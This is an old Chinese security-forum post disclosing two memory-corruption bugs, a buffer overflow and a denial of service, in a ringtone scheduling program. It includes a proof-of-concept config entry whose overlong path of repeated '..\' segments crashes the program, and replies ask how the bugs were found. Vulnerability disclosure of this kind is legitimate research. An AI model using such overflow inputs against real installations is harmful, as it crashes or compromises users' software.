首页
社区
课程
招聘
[原创]深蓝音乐铃声播放系统 7.5 内存破坏漏洞两枚(缓冲区溢出漏洞+拒绝服务漏洞)
发表于: 2014-6-8 12:26 3572

[原创]深蓝音乐铃声播放系统 7.5 内存破坏漏洞两枚(缓冲区溢出漏洞+拒绝服务漏洞)

2014-6-8 12:26
3572

程序下载地址http://www.skycn.com/soft/appid/13261.html 该存在2枚内存破坏漏洞。
漏洞1:处理某地址时由于地址过长,造成缓冲区溢出漏洞。
漏洞2:处理zxb文件错误,存在拒绝服务漏洞。

漏洞内容:
该存在2枚内存破坏漏洞。
漏洞1:处理某地址时由于地址过长,造成缓冲区溢出漏洞。
漏洞2:处理zxb文件错误,存在拒绝服务漏洞。

漏洞1poc: 打开程序路径下的SSPS.ini文件。把作息表一项改成

作息表=c:\program files\ssps\作息表\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\poc.zxb

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 3
支持
分享
最新回复 (3)
雪    币: 1184
活跃值: (1814)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
大神出一个查找这种漏洞的文章哇,如果愿意的话
2014-6-8 13:57
0
雪    币: 346
活跃值: (129)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
3
支持一下LZ
2014-6-8 23:46
0
雪    币: 38
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
如果有如何发现的更好的。
2014-7-5 15:34
0
游客
登录 | 注册 方可回帖
返回
//